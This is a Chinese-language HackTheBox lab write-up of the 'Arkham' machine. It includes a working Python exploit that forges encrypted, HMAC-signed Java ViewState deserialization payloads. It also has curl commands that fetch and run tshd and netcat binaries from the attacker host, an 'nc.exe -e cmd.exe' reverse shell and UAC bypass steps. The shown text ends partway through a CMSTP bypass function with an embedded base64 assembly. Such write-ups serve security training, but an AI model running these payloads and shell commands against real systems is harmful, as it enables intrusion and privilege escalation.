URL : https://app.hackthebox.com/machines/179
先講結論,這是我最近打過 HTB 最硬的一題 …… ,這絕對不是 Medium 的機器,他難度絕對絕對有 Hard。我覺得這一題對於初學者,甚至是剛拿到 OSCP 的人應該都會覺得打得很痛苦 QWQ
這一題題目包含的知識點:
- LUKS 解密
- Tomcat Config 解析
- HMAC 簽章
- DES 加解密
- Java Viewstate 反序列化
- Bypass Windows Defender
- Microsoft Outlook email folder (ost) 解析
- Base64 圖片還原
- Invoke-command 切換使用者
- Bypass CLM
- CMSTP UAC Bypass
SMB
有開 SMB
所以先匿名登上去
~/HTB/Arkham/new ᐅ smbclient.py 10.129.106.199
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
Type help for list of commands
# login meow
Password:
[*] GUEST Session Granted發現可以存取 BatShare,裡面有一個 appserver.zip,載下來分析
# shares
ADMIN$
BatShare
C$
IPC$
Users
# use BatShare
# ls
drw-rw-rw- 0 Sun Feb 3 21:04:13 2019 .
drw-rw-rw- 0 Sun Feb 3 21:04:13 2019 ..
-rw-rw-rw- 4046695 Sun Feb 3 21:04:13 2019 appserver.zip
# get appserver.zip解壓縮
~/HTB/Arkham/new ᐅ unzip appserver.zip
Archive: appserver.zip
inflating: IMPORTANT.txt
inflating: backup.imgLUKS Decrypt
發現 backup.img 裡面是一個 luks 的加密檔案
~/HTB/Arkham/new ᐅ file backup.img
backup.img: LUKS encrypted file, ver 1 [aes, xts-plain64, sha256] UUID: d931ebb1-5edc-4453-8ab1-3d23bb85b38eluks 可以透過暴力破解的方式來解
https://github.com/glv2/bruteforce-luks
這邊有點小通靈,看其他的 Writeup 得知密碼跟 batman 有關
所以我們可以自製 Wordlist
grep batman ~/WordLists/rockyou.txt | tee wordlist.txtbruteforce-luks -t 10 -f wordlist.txt -v 5 backup.img
# .....
Password found: batmanforever
Tried passwords: 61
Tried passwords per second: 0.305000
Last tried password: batman82就順利知道了它的密碼
接下來就是 mount 了
sudo cryptsetup open --type luks backup.img arkham
sudo mount /dev/mapper/arkham mount_point把檔案抓出來後,先 unmount
cd mount_point/
cp -r Mask ..
sudo umount mount_point
sudo cryptsetup close arkham在 Mask/tomcat-stuff 找到了 web.xml.bak
可以看到一點點的重點
<param-name>org.apache.myfaces.SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
<param-value>HmacSHA1</param-value>
</context-param>
<context-param>
<param-name>org.apache.myfaces.MAC_SECRET</param-name>
<param-value>SnNGOTg3Ni0=</param-value>我們知道了程式背後使用了 HMAC SHA1
而它們的 Key 如果用 base64 解開都是 JsF9876-
Web
接下來看一下 Web
Site Map 可以看到一個奇怪的 userSubscribe.faces
進入後可以進行 Subscribe
可以觀察到 javax.faces.ViewState 也許是有趣的東西
我們可以試著 Decode 看看
import base64
from urllib.parse import quote, unquote
src = "wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RQxTqLYuokmO70KtDtngjDm0mNzA9qHjYerxo0jW7zu1mdKBXtxnT1RmnWUWTJyCuNcJuxE%3D"
src_decode = unquote(src)
src_decode = base64.b64decode(src_decode.encode())
print(src_decode)
# b'\xc0z4\xc2b\xee\xe5\xc7\x88\xb4\x88\xbe#\xb5\xe4\x12-F\x01\xbe!\xd7e\x99\xf3\xde)\x03\xe6x8~\xdbr\x8d\xa3\\L\xb5E\x0cS\xa8\xb6.\xa2I\x8e\xefB\xad\x0e\xd9\xe0\x8c9\xb4\x98\xdc\xc0\xf6\xa1\xe3a\xea\xf1\xa3H\xd6\xef;\xb5\x99\xd2\x81^\xdcgOTf\x9de\x16L\x9c\x82\xb8\xd7\t\xbb\x11'但發現看不懂 QQ
Decrypt & Encrypt
但我們可以從先前的 config 猜測,他應該是一個加密搭配 Hmac sha1 的結果
所以我們可以試著驗證看看,Decode 出來的結果總共有 92 個 Bytes,假設 MAC 是 SHA1 的話,那會有 20 個 Bytes,因此可以把這段切兩半
message = src_decode[:-20]
mac = src_decode[-20:]理論上我們有 key,也有演算法,我們可以單純靠 message 來生成他的 mac,如果前提假設正確的話 …..
import base64
from urllib.parse import quote, unquote
import hmac
import hashlib
src = "wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RQxTqLYuokmO70KtDtngjDm0mNzA9qHjYerxo0jW7zu1mdKBXtxnT1RmnWUWTJyCuNcJuxE%3D"
src_decode = unquote(src)
src_decode = base64.b64decode(src_decode.encode())
message = src_decode[:-20]
mac = src_decode[-20:]
key = b"JsF9876-"
res = hmac.new(key=key,msg=message,digestmod=hashlib.sha1)
print(mac) # b'\x99\xd2\x81^\xdcgOTf\x9de\x16L\x9c\x82\xb8\xd7\t\xbb\x11'
print(res.digest()) # b'\x99\xd2\x81^\xdcgOTf\x9de\x16L\x9c\x82\xb8\xd7\t\xbb\x11'很順利的,我們猜到了!!
接下來要來通靈前半段,我們知道 key,知道 payload,但不知道加密演算法
我們知道 key 是 JsF9876- , 長度是 8 bytes
常見的 AES 加密可以用 key 長度來分
- 16 bytes = AES-128
- 24 bytes = AES-192
- 32 bytes = AES-256
看起來都不符合,而 DES 的 Key Size 是 56 bits = 7 Bytes
但是,根據維基百科的英文版有說到
According to ANSI INCITS 92-1981
One bit in each 8-bit byte of the KEY may be utilized for error detection in key generation, distribution, and storage. Bits 8, 16,..., 64 are for use in ensuring that each byte is of odd parity也就是說,DES 目前會吃 8 Bytes,而每一個 Bytes 的最後一個 Bit (8th, 16th, 32th …(從1開始數的))作為 parity 使用。
不過根據 PyCryptodome 的 Document 來講,8 bits were used for integrity (now they are ignored),也就是說現在他不會去 check parity 了。
不管了,講了這麼多,我們可以試著用 DES 來解看看
但 DES 又有 ECB, CBC, CFB, OFB, CTR, OPENPGP, EAX 這麼多種方法
最簡單的方法就是一個一個測一次,還好這次運氣不錯,第一個 mode ECB 就成功了
from Crypto.Cipher import DES
# key = b"JsF9876-"
message = b'\xc0z4\xc2b\xee\xe5\xc7\x88\xb4\x88\xbe#\xb5\xe4\x12-F\x01\xbe!\xd7e\x99\xf3\xde)\x03\xe6x8~\xdbr\x8d\xa3\\L\xb5E\x0cS\xa8\xb6.\xa2I\x8e\xefB\xad\x0e\xd9\xe0\x8c9\xb4\x98\xdc\xc0\xf6\xa1\xe3a\xea\xf1\xa3H\xd6\xef;\xb5'
key = b"JsF9876-"
d = DES.new(key=key,mode=DES.MODE_ECB)
r = d.decrypt(message)
print(r)b'\xac\xed\x00\x05ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\x03t\x00\x011pt\x00\x12/userSubscribe.jsp\x02\x02'回到前面說的,不 check parity bit, 我們可以做一個實驗,我們在不改動前 7 bit 的前提下,JsF9876- 可以變為 KrG8967,,而且解密答案是一樣的
In [5]: [bin(ord(i)) + f": {i}" for i in "JsF9876-"]
Out[5]:
['0b1001010: J',
'0b1110011: s',
'0b1000110: F',
'0b111001: 9',
'0b111000: 8',
'0b110111: 7',
'0b110110: 6',
'0b101101: -']
In [7]: [bin(ord(i)) + f": {i}" for i in "KrG8967,"]
Out[7]:
['0b1001011: K',
'0b1110010: r',
'0b1000111: G',
'0b111000: 8',
'0b111001: 9',
'0b110110: 6',
'0b110111: 7',
'0b101100: ,']from Crypto.Cipher import DES
message = b'\xc0z4\xc2b\xee\xe5\xc7\x88\xb4\x88\xbe#\xb5\xe4\x12-F\x01\xbe!\xd7e\x99\xf3\xde)\x03\xe6x8~\xdbr\x8d\xa3\\L\xb5E\x0cS\xa8\xb6.\xa2I\x8e\xefB\xad\x0e\xd9\xe0\x8c9\xb4\x98\xdc\xc0\xf6\xa1\xe3a\xea\xf1\xa3H\xd6\xef;\xb5'
# key = b"JsF9876-"
key = b"KrG8967,"
d = DES.new(key=key,mode=DES.MODE_ECB)
r = d.decrypt(message)
print(r)
# b'\xac\xed\x00\x05ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\x03t\x00\x011pt\x00\x12/userSubscribe.jsp\x02\x02'好,離題了,我們從解開的 byte 看到了 \xac\xed\x00\x05 開頭,可以確認他就是一個 Java 的反序列化結果
再來我們可以先做一件很無聊的事情,把解密的東西重新加密回去,簽一個 hmac,照理來說應該會跟最原始的 payload 一樣才對。
from Crypto.Cipher import DES
import hmac
import hashlib
import base64
from urllib.parse import unquote
src = "wHo0wmLu5ceItIi%2BI7XkEi1GAb4h12WZ894pA%2BZ4OH7bco2jXEy1RQxTqLYuokmO70KtDtngjDm0mNzA9qHjYerxo0jW7zu1mdKBXtxnT1RmnWUWTJyCuNcJuxE%3D"
src_decode = unquote(src)
src_decode = base64.b64decode(src_decode.encode())
message = src_decode[:-20]
mac = src_decode[-20:]
key = b"JsF9876-"
d = DES.new(key=key,mode=DES.MODE_ECB)
r = d.decrypt(message)
# r 是解密後的結果
d = DES.new(key=key,mode=DES.MODE_ECB)
r1 = d.encrypt(r)
# r1 是加密後的結果
res = hmac.new(key=key,msg=r1,digestmod=hashlib.sha1)
# 幫 r1 簽章
payload = r1 + res.digest()
print(src_decode == payload)答案是 True!!
所以我們可以自己定義一個 function,只要送入 payload 就可以幫我們加密 & 簽 hmac
def encrypt_and_hmac(data): # data is bytes
key = b"JsF9876-"
d = DES.new(key=key,mode=DES.MODE_ECB)
r1 = d.encrypt(data)
res = hmac.new(key=key,msg=r1,digestmod=hashlib.sha1)
return r1 + res.digest()接下來我們就要開始產 payload 了!
因為在 m1 mac 上面的 java 版本問題,會導致 ysoserial 怪怪的,所以我使用 Docker 來解這個問題。
FROM openjdk:11.0.16
COPY ysoserial-all.jar /root/ysoserial-all.jar
ENTRYPOINT ["java", "-jar", "/root/ysoserial-all.jar"]
# docker build . -t ysoserial:meow在執行這個 Docker 時,有個需要注意的點是,run 的過程千萬不要順手帶上 -it,不然 serial 的結果的 \x0a 會變成 \x0d\x0a
輸入 docker run --rm ysoserial:meow list 可以看到常見的 ysoserial Payload,最常見也最通用的是 CommonsCollections1 到 CommonsCollections7
不過我們不知道哪一個可以用 QQ,不同情境適用不同的內容,而產 payload 的方法大致是
docker run --rm ysoserial:meow CommonsCollections1 'ping 10.10.16.35'可以寫個小腳本把所有序列化結果都存出來
def generate_payload():
for i in range(1,7+1):
print(f"Generating CommonsCollections{i}")
os.popen(f"docker run --rm ysoserial:meow CommonsCollections{i} 'ping 10.10.16.35' > payloads/{i}.ser")再來需要把 payload 給加密,上 hmac 並轉 base64 後透過 Requests 送出 ,程式跑下去會噴一個錯誤 QQ
ValueError: Data must be aligned to block boundary in ECB mode也就是說,根據 ECB,我們需要把 Payload 進行 padding
from Crypto.Util.Padding import pad
# import ... 略
def encrypt_and_hmac(data): # data is bytes
key = b"JsF9876-"
d = DES.new(key=key,mode=DES.MODE_ECB)
r1 = d.encrypt(pad(data,8))
res = hmac.new(key=key,msg=r1,digestmod=hashlib.sha1)
return r1 + res.digest()Padding Size 預設 DES 每個 Block 就是 64 Bit,所以選擇 8
Web Exploit
再來我們就可以寫一個迴圈來爆看看我們能用的 Payload 是哪些,首先先開 tcpdump 收 icmp
sudo tcpdump -i utun7 icmpfrom Crypto.Cipher import DES
import hmac
import hashlib
import base64
from urllib.parse import unquote
import os
import requests
from Crypto.Util.Padding import pad
def encrypt_and_hmac(data): # data is bytes
key = b"JsF9876-"
d = DES.new(key=key,mode=DES.MODE_ECB)
r1 = d.encrypt(pad(data,8))
res = hmac.new(key=key,msg=r1,digestmod=hashlib.sha1)
return r1 + res.digest()
def generate_payload():
for i in range(1,7+1):
print(f"Generating CommonsCollections{i}")
os.popen(f"docker run --rm ysoserial:meow CommonsCollections{i} 'ping 10.10.16.35' > payloads/{i}.ser")
# generate_payload()
def send_payload(i):
payload = open(f"payloads/{i}.ser","rb").read()
encrypted_payload = encrypt_and_hmac(payload)
base64_payload = base64.b64encode(encrypted_payload).decode()
burp0_url = "http://10.129.106.199:8080/userSubscribe.faces"
burp0_cookies = {"JSESSIONID": "DFE45108C21A6F29EEED16F9DE849820"}
burp0_data = {"j_id_jsp_1623871077_1:email": "meowmeow",
"j_id_jsp_1623871077_1:submit": "SIGN UP",
"j_id_jsp_1623871077_1_SUBMIT": "1",
"javax.faces.ViewState": base64_payload}
requests.post(burp0_url, cookies=burp0_cookies, data=burp0_data)
for i in range(1,7+1):
send_payload(i)跑下去可以確定我們有收到 Payload
17:28:23 steven@StevendeMacBook-Pro.local new sudo tcpdump -i utun7 icmp 130 ↵
Password:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on utun7, link-type NULL (BSD loopback), capture size 262144 bytes
17:28:50.041617 IP 10.129.106.199 > 10.10.16.35: ICMP echo request, id 1, seq 21, length 40
17:28:50.041681 IP 10.10.16.35 > 10.129.106.199: ICMP echo reply, id 1, seq 21, length 40
17:28:50.324666 IP 10.129.106.199 > 10.10.16.35: ICMP echo request, id 1, seq 22, length 40
17:28:50.324747 IP 10.10.16.35 > 10.129.106.199: ICMP echo reply, id 1, seq 22, length 40
17:28:50.697327 IP 10.129.106.199 > 10.10.16.35: ICMP echo request, id 1, seq 23, length 40
17:28:50.697401 IP 10.10.16.35 > 10.129.106.199: ICMP echo reply, id 1, seq 23, length 40
17:28:51.055909 IP 10.129.106.199 > 10.10.16.35: ICMP echo request, id 1, seq 24, length 40
17:28:51.055991 IP 10.10.16.35 > 10.129.106.199: ICMP echo reply, id 1, seq 24, length 40那接下來其實也很簡單,我們可以用類似玩終極密碼的方法來找我們能用的 Payload 是哪個
for i in range(1,3+1):
send_payload(i)
# 失敗
for i in range(4,7+1):
send_payload(i)
# 成功
send_payload(5)
# 成功確定 CommonsCollections5 可用後,我們可以把 Exploit 寫的更 Friendly 一點
from Crypto.Cipher import DES
import hmac
import hashlib
import base64
from urllib.parse import unquote
import os
import requests
from Crypto.Util.Padding import pad
def encrypt_and_hmac(data): # data is bytes
key = b"JsF9876-"
d = DES.new(key=key,mode=DES.MODE_ECB)
r1 = d.encrypt(pad(data,8))
res = hmac.new(key=key,msg=r1,digestmod=hashlib.sha1)
return r1 + res.digest()
def generate_payload(payload):
serialize = os.popen(f"docker run --rm ysoserial:meow CommonsCollections5 '{payload}' | base64").read()
serialize_b64 = base64.b64decode(serialize.encode())
return serialize_b64
def send_payload(payload):
encrypted_payload = encrypt_and_hmac(payload)
base64_payload = base64.b64encode(encrypted_payload).decode()
burp0_url = "http://10.129.106.199:8080/userSubscribe.faces"
burp0_cookies = {"JSESSIONID": "DFE45108C21A6F29EEED16F9DE849820"}
burp0_data = {"j_id_jsp_1623871077_1:email": "meowmeow",
"j_id_jsp_1623871077_1:submit": "SIGN UP",
"j_id_jsp_1623871077_1_SUBMIT": "1",
"javax.faces.ViewState": base64_payload}
requests.post(burp0_url, cookies=burp0_cookies, data=burp0_data)
payload = generate_payload("ping 10.10.16.35")
send_payload(payload)以為接著這樣就順利 RCE 了嗎?不,接下來我又踩了一堆雷 QQ
首先我跑了
certutil -urlcache -f http://10.10.16.35發現收不到 Request,有可能是有開 Defender,或是透過某些奇怪的方法 Disable 了 certutil
SMB 也都不行 QQQ
最後發現電腦裡面有裝 curl
cmd /c curl 10.10.16.35但是 msfvenom 的 payload 也都會被吃掉 QQ
因此我使用了 cyku 大大的 tsh
cmd /c curl 10.10.16.35/tshd_windows_amd64.exe -o C:/Users/Public/tshd.exe"
cmd /c C:/Users/Public/tshd.exe -c 10.10.16.35 -p 9988然後就收回 shell 了!!
StevendeMacBook-Pro:new $ tsh -p 9988 cb
Waiting for the server to connect...connected.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\tomcat\apache-tomcat-8.5.37\bin>
C:\>whoami
arkham\alfredAlfred 的桌面就能拿到 user.txt
提權
在 C:\Users\Alfred\Downloads\backups 底下可以看到一個 backup.zip
我們可以開一個 SMB Server 來收檔案
… 嗎?
C:\Users\Alfred\Downloads\backups>copy backup.zip \\10.10.16.35\meow
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your
PC from unsafe or malicious devices on the network.
0 file(s) copied.不行 QQ
那我們可以丟一隻 nc 進去幫我們
curl 10.10.16.35/nc.exe -o nc.exe# attacker
ncat -nlvp 7766 > backup.zip
# victim
nc.exe 10.10.16.35 7766 < backup.zipmkdir backup
unzip backup.zip -d backup發現裡面有一個 ost 檔案
┌[steven☮StevendeMacBook-Pro.local]-(~/HTB/Arkham/new/backup)
└> file alfred@arkham.local.ost
alfred@arkham.local.ost: Microsoft Outlook email folderOST 是 Outlook 檔案,可以使用 Linux 的 readpst 工具來解碼
steven@lima-ubuntu-amd64:/Users/steven/HTB/Arkham/new/backup$ readpst alfred@arkham.local.ost
Opening PST file and indexes...
Processing Folder "Deleted Items"
Processing Folder "Inbox"
Processing Folder "Outbox"
Processing Folder "Sent Items"
Processing Folder "Calendar"
Processing Folder "Contacts"
Processing Folder "Conversation Action Settings"
Processing Folder "Drafts"
Processing Folder "Journal"
Processing Folder "Junk E-Mail"
Processing Folder "Notes"
Processing Folder "Tasks"
Processing Folder "Sync Issues"
Processing Folder "RSS Feeds"
Processing Folder "Quick Step Settings"
"alfred@arkham.local.ost" - 15 items done, 0 items skipped.
"Inbox" - 0 items done, 7 items skipped.
"Calendar" - 0 items done, 3 items skipped.
Processing Folder "Conflicts"
Processing Folder "Local Failures"
Processing Folder "Server Failures"
"Sync Issues" - 3 items done, 0 items skipped.
"Drafts" - 1 items done, 0 items skipped.解開後會看到一個 Drafts.mbox 檔案, 用 VSCode 打開可以看到類似 Email 跟 HTML 混雜的東西
第 554 行可以看到 base64 的 png 圖片
我們可以寫一個 py 還原 Base64
import base64
data = b"""iVBORw0KGgoAAAANSUhEUgAAAqUAAAFXCAIAAAAUCKDqAAAAAXNSR0IArs4c6QAAJwVJREFUeF7t
3V+oZdd5GPCjUmibujISRUNh5GhiCya2hI0lVXSoEwXXCRMoqpUXyzR6MFaUIlwh2S9+kB+sB7/Y
ElNjWskmDzJ0/FKpItCBGDGSBROGKMYgoaqM3XEsQZBpLazUTelLu8/Z9+677/679jn7O3edO7/L
#... 略
"""
d = base64.b64decode(data)
with open("decoded.png",'wb') as f:
f.write(d)接下來就能看到這張圖了
到目前為止,我們取得了 batman 的帳密
batman / Zx^#QZX+T!123
切換使用者
從 net user 可以發現他是 Local Admin 理論上我們只要切換過去應該就是 Admin 了!!!
接下來經過了種種嘗試,發現 batman 摸不到 Public,但他有開 SMB,所以我們可以用 smb 上去!!
# login batman
Password:
[*] USER Session Granted
# shares
ADMIN$
BatShare
C$
IPC$
Users
# use Users
# ls
drw-rw-rw- 0 Sun Feb 3 21:24:10 2019 .
drw-rw-rw- 0 Sun Feb 3 21:24:10 2019 ..
drw-rw-rw- 0 Sat Oct 15 15:13:25 2022 Batman
drw-rw-rw- 0 Fri Feb 1 10:49:06 2019 Default
-rw-rw-rw- 174 Sat Feb 2 00:10:07 2019 desktop.ini
# cd Batman
# put nc.exe但用 cpau 還是跑不起來,所以改用 powershell 的方法
powershell
$username = 'batman'
$password = 'Zx^#QZX+T!123'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-command -computername ARKHAM -credential $credential -scriptblock {cmd.exe /c C:\Users\Batman\nc.exe -e cmd.exe 10.10.16.3
5 9977 }收到 Reverse shell 後再轉 tsh (一樣用 smb 丟上 batman 家目錄)
tshd_windows_amd64.exe -c 10.10.16.35 -p 9966就可以拿到 batman 的 shell 了!
C:\Users\Batman>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled但發現有 UAC QQQ
不過其實可以用 SMB 直接取 Flag,但這樣好弱ㄛ,我還是認真打吧
C:\Users\Batman>type \\localhost\c$\users\administrator\desktop\root.txt
636783f913109f2809701e8545ef4fdbUAC Bypass
這邊我預計會使用 CMSTP 的 UAC Bypass 方法
我參考了 https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html
直接採用 Weaponizing with PowerShell 的解法
function Bypass-UAC
{
Param(
[Parameter(Mandatory = $true, Position = 0)]
[string]$Command
)
if(-not ([System.Management.Automation.PSTypeName]'CMSTPBypass').Type)
{
[Reflection.Assembly]::Load([Convert]::FromBase64String("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QnlwYXNzLmRsbABDTVNUUEJ5cGFzcwBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AEluZkRhdGEAU2hvd1dpbmRvdwBTZXRGb3JlZ3JvdW5kV2luZG93AEJpbmFyeVBhdGgAU2V0SW5mRmlsZQBFeGVjdXRlAFNldFdpbmRvd0FjdGl2ZQAuY3RvcgBoV25kAG5DbWRTaG93AENvbW1hbmRUb0V4ZWN1dGUAUHJvY2Vzc05hbWUAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAENNU1RQLVVBQy1CeXBhc3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAERsbEltcG9ydEF0dHJpYnV0ZQB1c2VyMzIuZGxsAFN5c3RlbS5JTwBQYXRoAEdldFJhbmRvbUZpbGVOYW1lAENoYXIAQ29udmVydABUb0NoYXIAU3RyaW5nAFNwbGl0AFN5c3RlbS5UZXh0AFN0cmluZ0J1aWxkZXIAQXBwZW5kAFJlcGxhY2UAVG9TdHJpbmcARmlsZQBXcml0ZUFsbFRleHQARXhpc3RzAENvbnNvbGUAV3JpdGVMaW5lAENvbmNhdABTeXN0ZW0uRGlhZ25vc3RpY3MAUHJvY2Vzc1N0YXJ0SW5mbwBzZXRfQXJndW1lbnRzAHNldF9Vc2VTaGVsbEV4ZWN1dGUAUHJvY2VzcwBTdGFydABJbnRQdHIAWmVybwBvcF9FcXVhbGl0eQBTeXN0ZW0uV2luZG93cy5Gb3JtcwBTZW5kS2V5cwBTZW5kV2FpdABHZXRQcm9jZXNzZXNCeU5hbWUAUmVmcmVzaABnZXRfTWFpbldpbmRvd0hhbmRsZQAuY2N0b3IAAAMuAAAfQwA6AFwAdwBpAG4AZABvAHcAcwBcAHQAZQBtAHAAAANcAAAJLgBpAG4AZgAAKVIARQBQAEwAQQBDAEUAXwBDAE8ATQBNAEEATgBEAF8ATABJAE4ARQAAQUMAbwB1AGwAZAAgAG4AbwB0ACAAZgBpAG4AZAAgAGMAbQBzAHQAcAAuAGUAeABlACAAYgBpAG4AYQByAHkAIQAAMVAAYQB5AGwAbwBhAGQAIABmAGkAbABlACAAdwByAGkAdAB0AGUAbgAgAHQAbwAgAAAJLwBhAHUAIAAAC2MAbQBzAHQAcAAAD3sARQBOAFQARQBSAH0AAISPWwB2AGUAcgBzAGkAbwBuAF0ADQAKAFMAaQBnAG4AYQB0AHUAcgBlAD0AJABjAGgAaQBjAGEAZwBvACQADQAKAEEAZAB2AGEAbgBjAGUAZABJAE4ARgA9ADIALgA1AA0ACgANAAoAWwBEAGUAZgBhAHUAbAB0AEkAbgBzAHQAYQBsAGwAXQANAAoAQwB1AHMAdABvAG0ARABlAHMAdABpAG4AYQB0AGkAbwBuAD0AQwB1AHMAdABJAG4AcwB0AEQAZQBzAHQAUwBlAGMAdABpAG8AbgBBAGwAbABVAHMAZQByAHMADQAKAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAPQBSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4ADQAKAA0ACgBbAFIAdQBuAFAAcgBlAFMAZQB0AHUAcABDAG8AbQBtAGEAbgBkAHMAUwBlAGMAdABpAG8AbgBdAA0ACgA7ACAAQwBvAG0AbQBhAG4AZABzACAASABlAHIAZQAgAHcAaQBsAGwAIABiAGUAIAByAHUAbgAgAEIAZQBmAG8AcgBlACAAUwBlAHQAdQBwACAAQgBlAGcAaQBuAHMAIAB0AG8AIABpAG4AcwB0AGEAbABsAA0ACgBSAEUAUABMAEEAQwBFAF8AQwBPAE0ATQBBAE4ARABfAEwASQBOAEUADQAKAHQAYQBzAGsAawBpAGwAbAAgAC8ASQBNACAAYwBtAHMAdABwAC4AZQB4AGUAIAAvAEYADQAKAA0ACgBbAEMAdQBzAHQASQBuAHMAdABEAGUAcwB0AFMAZQBjAHQAaQBvAG4AQQBsAGwAVQBzAGUAcgBzAF0ADQAKADQAOQAwADAAMAAsADQAOQAwADAAMQA9AEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4ALAAgADcADQAKAA0ACgBbAEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4AXQANAAoAIgBIAEsATABNACIALAAgACIAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwB